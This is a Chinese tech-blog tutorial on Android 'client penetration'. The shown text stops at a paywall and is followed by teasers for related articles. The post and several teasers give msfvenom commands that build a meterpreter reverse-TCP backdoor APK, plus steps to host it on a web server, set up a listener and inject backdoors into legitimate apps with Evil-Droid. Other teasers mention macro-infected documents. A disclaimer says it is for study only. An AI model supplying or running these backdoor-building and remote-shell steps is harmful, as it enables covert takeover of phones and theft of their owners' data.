安卓客户端渗透

最新推荐文章于 2025-06-10 17:00:40 发布
最新推荐文章于 2025-06-10 17:00:40 发布
阅读量1.3k 收藏 13
点赞数 5
CC 4.0 BY-SA版权
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Time_worm/article/details/140692568

在此声明文章仅供相互学习参考,严禁利用于违法犯罪,任何事故自行承担!!

一、生成APK后门

通过 MSF 生成一个 apk 的后门应用

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 R > hack.apk

将它移到/var/www/html/目录下

mv hack.apk /var/www/html/

在Windows上下载,并在模拟器中安装再打开,和其他的渗透测试的一样的步骤监听等待目标机上返回连接,kali即可获得权限

 当然也可以下载到自己手机中,最好是已经换下来的旧手机

二、注入后门到APP

首先要禁用IPV6,不然可能会影响生成的payload质量

使用命令echo "net.ipv6.conf.eth0.disable_ipv6=1" \>\>/etc/sysctl.conf

然后通过sysctl -p检查

我们使用Evil-Droid工具,这是一个基于Python的开源工具,专门用于自动化安卓应用的安全分析。它旨在帮助安全研究人员、开发人员和普通用户快速检测潜在的恶意行为或漏洞,并理解应用程序的工作原理。

将安装Evil-Droid工具上传并解压进入目录中

这个工具会检测

最低0.47元/天 解锁文章

200万优质内容无限畅学
Time_worm
关注
利用游戏软件注入漏洞渗透安卓手机
Cwillchris的博客
05-27 1706
实验环境: kali攻击机(192.168.98.30) window目标机(192.168.98.35) Evil-Droid工具 3D摩托安装包 实验步骤: 1、禁用IPV6 echo "net.ipv6.conf.eth0.disable_ipv6 = 1" >> /etc/sysctl.conf sysctl -p ifconfig 2、安装Evil-Droid工具 xshell上传master 解压并进入目录 unzip master cd
利用 0day 双杀-java 环境-宏感染-安卓客户端渗透
weixin_46035615的博客
04-26 3601
利用 0day 双杀-java 环境-宏感染-安卓客户端渗透 1 实战-利用 0DAY 漏洞获取 shell 2 实战-基于 java 环境的漏洞利用获取 shell 3 实战-利用宏感染 word 文档获取 shell 4 安卓客户端渗透
网络安全新手入门—MSF渗透安卓手机(小白的第一次黑客渗透
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
06-10 819
MSF,全称为,是kali中一款全球知名的开源渗透测试工具。此文章中的方法只能进行内网渗透。由于kali在虚拟机中,其显示的内网IP无法被外网的安卓手机S直接访问,所以不能直接将文章方法应用于外网。该实验为模拟环境,未经授权的渗透都是违法行为,我们都是守法的好公民。而且这种方法只能渗透安卓10以下的系统,入侵渗透更高级的系统需要更加专业的知识,再加上只能进行内网渗透,所以这种方法很难进行违法渗透
安卓APP渗透安全测试
qq_33540190的博客
11-05 2424
 动态分析MobSF支持Android(iOS 应用不支持),可以动态调试正在运行的应用。 如果需要动态分析,请不要在Docker或虚拟机中部署MobSF,另外需要下载安装Genymotion模拟器。
Android渗透入门
weixin_52206305的博客
02-07 768
Android应用采用Java编程语言编写。使用Android SDK工具将代码连同数据和资源文件编译到一个APK:android的软件包,即带有.apk后缀的文件。一个apk文件包含应用的所有内容(图像、数据、音频等等),安装apk文件,需要Android系统的设备。安装到设备之后,所有的应用都在沙箱内运行。默认情况下,系统会为每个应用分配一个唯一的 Linux用户ID(该ID仅由系统使用,应用并不知晓)。系统为应用中的所有文件设置权限,使得只有分配给该应用的用户ID才能访问这些文件。
安卓apk 客户端渗透<高级>
weixin_68281676的博客
09-12 3666
Failed to verify signed artifacts报错解决
Android渗透测试Android渗透测试入门教程大学霸
大学霸__IT达人
02-04 3270
Android渗透测试Android渗透测试入门教程大学霸
thinkphp rce-log4j2-宏感染-安卓客户端渗透
09-21 1367
客户端渗透+漏洞复现+后续利用
MSF实战-利用0day双杀java环境-宏感染-安卓客户端进行渗透
L120305q的博客
03-31 852
MSF实战笔记
客户端渗透
8888的博客
07-03 948
介绍:我们要进行客户端渗透,我们生成一个可执行程序,也是简单粗暴,MSF建立监听,把它发给受害者,只要受害者点击,监听机监听的机器直接上线(现在这种方法一般不会成功,杀毒软件会直接杀掉,这个程序可以经过几种语言编码,降低杀毒软件的防范可能直接免杀,虽然不能实际直接使用,但可以让我们了解和预防这类的攻击,本质上是一样的) 生成一个带有反弹连接的EXE程序:开启Apache服务使能够下载:访问这个虚拟机IP及其对应的文件,下载放在靶机上面去,并且关闭杀毒软件,要不然会直接把程序清除MSF开启监听:我们点击我们下
Android 渗透测试学习手册 中文版(一)
龙哥盟
07-06 1510
自从 Android 被谷歌收购(2005 年),谷歌已经完成了整个开发,在过去的 9 年里,尤其是在安全方面,有很多变化。现在,它是世界上最广泛使用的智能手机平台,特别是由于不同的手机制造商,如 LG,三星,索尼和 HTC 的支持。Android 的后续版本中引入了许多新概念,例如 Google Bouncer 和 Google App Verifier。我们将在本章逐一介绍它们。如果我们看看 Android 的架构,如下图所示,我们将看到它被分为四个不同的层。
使用msf工具对安卓手机进行渗透攻击———超详细
热门推荐
weixin_71669458的博客
07-28 2万+
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。
Android 渗透小知识点
weixin_30755393的博客
07-15 152
客户端用于 ADB 通信的默认端口始终是 5037,设备使用从 5555 到 5585 的端口 adb devices用于显示所有已连接设备, 有时候会出现一些问题, 这时候需要使用adb kill-server与adb start-server重启adb Sdk/tools/android list avd可以列出所有AVD可用的设备 C:\Android\Sdk\emulator\e...
实战Metasploit之安卓渗透舍友
大方子
09-13 6941
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用 安卓手机在移动端占有很高的比重,今天就带领大家一块利用Metasploit进行一次渗透之旅,安卓渗透和windows其实差不多的,好啦,不废话了,正题开始。 环境:kali linux 2016.02和安卓手机一部 准备工作:当然是查看自己的ip啦~ 正式开始: 首先,生成一个反弹木马:在终端输入  msfve...
kali 渗透安卓
qq_33391644的博客
02-08 5049
1.首先,生成一个反弹木马命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.104 lport=44444 r>/root/123.apk2.启动msfconsole命令:msfconsole3.搭建监控环境命令:use exploit/multi/handlerset payload android/meterpr...
渗透测试之移动端 安卓
信息安全-企业安全-数据安全
09-28 466
渗透测试之移动端,对于安卓,一般使用如下方法进行安全分析,如下表所示: # Adb # https://developer.android.com/studio/command-line/adb?hl=es-419 adb connect IP:PORT/ID adb devices adb shell adb push adb install # Analyze URLs in apk: # https://github.com/shivsahni/APKEnum python APKEnum.py
黑客入门指南:打造酷炫安卓环境,轻松进行移动渗透测试!
ytt0523_com的博客
07-07 1031
统计数据显示,目前我国网安人才缺口达140万之多…不管你是网络安全爱好者还是有一定工作经验的从业人员不管你是刚毕业的行业小白还是想跳槽的专业人员都需要这份超级超级全面的资料几乎打败了市面上90%的自学资料并覆盖了整个网络安全学习范畴一定会对你的学习有所帮助!朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享。
Android渗透工具(建议收藏)
哆啦安全
09-15 2767
Android逆向分析、渗透测试、漏洞扫描、安全检测相关实用工具
梆梆安全:移动应用客户端渗透测试关键点详析
本文档是关于“梆梆安全-移动应用客户端渗透测试检测点”的技术指南,主要针对Android和iOS客户端的安全评估。该文档详细介绍了在对移动应用进行渗透测试时,针对两个平台的特定检测点,旨在确保应用的安全性。 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值